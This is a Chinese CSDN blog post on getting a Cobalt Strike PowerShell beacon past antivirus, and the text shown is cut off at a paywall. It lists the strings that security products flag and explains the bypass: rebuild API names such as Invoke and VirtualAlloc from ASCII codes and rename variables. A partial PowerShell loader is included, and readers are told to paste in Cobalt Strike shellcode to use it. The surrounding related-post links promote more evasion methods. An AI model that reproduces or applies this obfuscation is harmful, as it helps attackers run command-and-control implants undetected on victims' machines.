CS powershell马免杀

最新推荐文章于 2024-06-02 21:01:15 发布
最新推荐文章于 2024-06-02 21:01:15 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: cs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43899495/article/details/113590079
版权

修改原理

1.杀软检测的几个点:

Invoke
VirtualAlloc
kernel32.dll
FormBase64String
System.dll
func_get_proc_address
func_get_delegate_type
$var_va
$var_buffer
$var_runme
$var_code
$x

2.bypass方法:

(1)函数名称
将上面过滤的函数名,ascii编码解码后再调用
(2)变量名
修改变量名

改版后代码
把cs生成powershell脚本的shellcode贴进去即可使用
在这里插入图片描述
(ps:CS生成powershell脚本)
在这里插入图片描述
点击generate后会在指定位置生成beacon.ps1
记事本打开beacon.ps1,shellcode部分如下图:
在这里插入图片描述

Set-StrictMode -Version 2

function asc{
   
	$ide="";
	for($calc=0;$calc -lt $arr.Count;$calc++){
   
		$ide=-Join($ide,[char]$arr[$calc]);
	}
	return $ide;
}

$ide=asc($arr=(73,110,118,111,107,101));
$vl=asc($arr=(86, 105, 114, 116, 117, 97, 108, 65, 108, 108, 111, 99))
最低0.47元/天 解锁文章
老鄧头
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
powershell cs上线_红队CS工具的基本使用
weixin_39976382的博客
10-21 1204
简介:Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell生成等。还可以进行钓鱼攻击包括:网站克隆、目标信息获取、java执行、浏览器攻击等CS主要用于团体协作,可以让多个攻击者同时连接到团体服务器,共享信息。环境搭建:CS分为客户端和服务端,其中服务端只能运行在Linux系统...
CS-Loader:CS免杀
03-22
V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell免杀(已完成) V2.0:开发出UI界面V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更...
利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
m0_62239233的博客
04-18 765
记录渗透学习中的实验过程。
针对cs生成powershell免杀火绒
最新发布
WenHeMian_的博客
06-02 377
第二种,Win-PS2EXE,对于ps2exe是打包python专门给win使用的,在其他篇章中会用此来打包python的免杀脚本。心跳0s, byassUac提权成功,但是要谨慎提权!对于函数名和变量名进行混淆,不要用原始名,因为都被人用烂了,360云脑,windows df直接杀。第一种Lodan,玩内网的肯定都很熟悉,这东西其实在cs插件Lodan的目录里面就有LodanGUI。注意我这里是x64的木,与x86不同的就是代码结构,免杀手法相同。火绒这个东西,只要一开始不报毒,那以后基本很难被杀了。
应急--内存查杀演示(极简)
m0_58355451的博客
08-30 2573
由客户端发起的Web请求后,中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作,内存就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的。以java为例,客户端发起的web请求会依次经过Listener、Filter、Servlet三个组件,我们只要在这个请求的过程中做手脚,在内存中修改已有的组件或者动态注册一个新的组件,插入恶意的shellcode,就可以达到我们的目的。
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 723
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
CS免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
CS-Avoid-killing:CS免杀加载器
05-05
V1.5: 加入C版本CS免杀(已完成)V1.7:加入Powershell免杀(已完成)V2.0:开发出UI界面V2.0: 开发成在线免杀平台(已完成)PS: 在实际使用中发现图形化界面不利于和其他工具结合,相比之下命令行的方式更具有扩展性关于...
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
Powershell
03-20
PowerShell是一种强大的命令行接口和脚本语言,由微软开发,专为系统管理员和开发者设计。它基于.NET Framework,提供了一种更为现代化、面向对象的方式来管理Windows操作系统和应用程序。相较于传统的命令提示符...
azure-docs-powershell.cs-CZ
02-16
标题“azure-docs-powershell.cs-CZ”表明这是一个关于Azure PowerShell的中文文档项目,针对的是捷克语(CS-CZ)用户。Azure PowerShell是微软提供的一个模块化工具集,用于通过PowerShell命令行和脚本环境管理Azure...
powershell:PowerShell 脚本
06-29
PowerShell是一种强大的命令行接口和脚本语言,主要用于自动化Windows操作系统的管理任务。它由微软开发,旨在替代传统的命令提示符(CMD),提供更丰富的功能和更强的控制能力。PowerShell基于.NET框架,使得开发者...
powershell_credentials
06-24
标题中的“powershell_credentials”可能指的是一个PowerShell脚本,用于处理凭据管理或安全相关的任务。在PowerShell中,管理用户凭据是常见的需求,特别是在自动化任务、远程访问或者执行需要管理员权限的操作时。...
powershell脚本转exe文件
01-22
在IT行业中,有时我们需要将PowerShell脚本转换为可执行(EXE)文件,以便于在没有PowerShell环境或者需要更安全分发的环境中运行。标题和描述中提到的"powershell脚本转exe文件"就是这个过程。下面将详细解释如何...
powershell
03-06
PowerShell是一种强大的命令行接口和脚本语言,主要用于自动化和配置Windows操作系统以及应用程序。它由微软开发,旨在提高系统管理员和开发者的效率,通过提供一套更全面、更易用的命令集来替代传统的命令提示符...
免杀学习(三)powershell
m0_62207170的博客
01-12 610
powershell免杀
cs免杀(一)
kuuhh的博客
08-12 633
前言 网上搜了几篇文章复现下操作。 ps1文件免杀 生成ps1文件 将关键字FromBase64String括号内的字符串复制起来。 将下面代码保存改为ps1文件执行 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串') $s |foreach { $string = $string + $_.ToString()+','} $string > d:\1.txt 代码输出到1.t
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 4091
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
PowerShell基础教程
1. **PowerShell基础知识**:包括如何启动PowerShell,理解PowerShell的命令行界面(Console)和PowerShell ISE(集成脚本环境),以及PowerShell的工作原理。 2. **PowerShell语法**:讲解PowerShell的命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值